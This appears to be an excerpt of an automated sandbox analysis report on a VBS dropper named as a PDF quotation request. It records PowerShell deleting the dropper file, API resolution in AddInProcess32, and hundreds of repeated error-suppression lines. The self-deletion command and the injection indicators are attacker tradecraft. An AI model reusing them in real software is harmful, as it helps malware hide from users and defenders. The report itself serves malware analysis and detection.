                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,22_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
